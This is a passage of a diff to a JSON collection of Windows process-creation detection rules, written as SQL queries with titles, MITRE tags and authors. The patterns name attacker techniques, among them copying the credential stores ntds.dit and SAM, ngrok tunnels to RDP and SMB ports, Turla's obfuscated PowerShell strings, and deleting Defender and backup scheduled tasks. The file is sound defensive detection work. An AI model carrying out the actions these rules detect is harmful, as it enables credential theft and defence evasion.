'vmmem'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_image_missing.yml" + "filename": "proc_creation_win_lolbin_diskshadow.yml" }, { - "title": "HH.EXE Execution", - "id": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", + "title": "PUA - Ngrok Execution", + "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", "status": "test", - "description": "Detects the usage of \"hh.exe\" executing recently modified .chm files.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", + "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.001" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unlikely" + "Another tool that uses the command line switches of Ngrok", + "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' AND CommandLine LIKE '%.chm%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (NewProcessName LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_chm_execution.yml" + "filename": "proc_creation_win_pua_ngrok.yml" }, { - "title": "Non-privileged Usage of Reg or Powershell", - "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", + "title": "Suspicious Control Panel DLL Load", + "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", "status": "test", - "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", - "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", + "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" + "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" }, { - "title": "Suspicious Regsvr32 HTTP IP Pattern", - "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", + "title": "Delete Important Scheduled Task", + "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", "status": "experimental", - "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "FQDNs that start with a number" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_http_pattern.yml" + "filename": "proc_creation_win_schtasks_delete.yml" }, { - "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", - "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", - "status": "experimental", - "description": "Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Commands May 2020", + "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", + "status": "test", + "description": "Detects commands used by Turla group as reported by ESET in May 2020", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.g0010", "attack.execution", - "attack.t1047" + "attack.t1059.001", + "attack.t1053.005", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" + "filename": "proc_creation_win_apt_turla_comrat_may20.yml" }, { - "title": "Sysmon Driver Unloaded Via Fltmc.EXE", - "id": "4d7cda18-1b12-4e52-b45c-d28653210df8", - "status": "test", - "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", - "author": "Kirill Kiryanov, oscd.community", + "title": "Rundll32 UNC Path Execution", + "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", + "status": "experimental", + "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.execution", + "attack.t1021.002", + "attack.t1218.011" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" + "filename": "proc_creation_win_rundll32_unc_path.yml" }, { - "title": "Regsvr32 Flags Anomaly", - "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", + "title": "Copying Sensitive Files with Credential Data", + "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", "status": "test", - "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", - "author": "Florian Roth (Nextron Systems)", + "description": "Files with well-known filenames (sensitive files with credential data) copying", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003", + "car.2013-07-001", + "attack.s0404" ], "falsepositives": [ - "Unknown" + "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" + "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" }, { - "title": "Suspicious PowerShell Parameter Substring", - "id": "36210e0d-5b19-485d-a087-c096088885f0", - "status": "test", - "description": "Detects suspicious PowerShell invocation with a parameter substring", - "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", + "title": "Renamed PsExec Service Execution", + "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", + "status": "experimental", + "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate administrative tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' ESCAPE '\\' OR CommandLine LIKE '% /nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'psexesvc.exe' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" + "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml" }, { - "title": "Suspicious File Download via CertOC.exe", - "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", - "status": "experimental", - "description": "Detects when a user downloads file by using CertOC.exe", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Dridex Activity", + "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", + "status": "stable", + "description": "Detects potential Dridex acitvity via specific process patterns", + "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055", + "attack.discovery", + "attack.t1135", + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% view%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_lolbin_certoc_download.yml" + "filename": "proc_creation_win_malware_dridex.yml" }, { - "title": "Suspicious Schtasks From Env Var Folder", - "id": "81325ce1-be01-4250-944f-b4789644556f", - "status": "experimental", - "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", - "author": "Florian Roth (Nextron Systems)", + "title": "RDP Connection Allowed Via Netsh.EXE", + "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "status": "test", + "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", + "author": "Sander Wiebing", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Benign scheduled tasks creations or executions that happen often during software installations", - "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" + "Legitimate administration activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_env_folder.yml" + "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" }, { - "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", - "id": "07aa184a-870d-413d-893a-157f317f6f58", + "title": "PowerShell Base64 Encoded Invoke Keyword", + "id": "6385697e-9f1b-40bd-8817-f4a91f40508e", "status": "test", - "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", + "author": "pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t", "tags": [ - "attack.discovery", "attack.execution", - "attack.t1615", - "attack.t1059.005" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_gather_network_info_execution.yml" + "filename": "proc_creation_win_powershell_base64_invoke.yml" }, { - "title": "Suspicious RazerInstaller Explorer Subprocess", - "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", - "status": "test", - "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", - "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", + "title": "Suspect Svchost Activity", + "id": "16c37b52-b141-42a5-a3ea-bbe098444397", + "status": "experimental", + "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", + "author": "David Burkett, @signalblur", "tags": [ + "attack.defense_evasion", 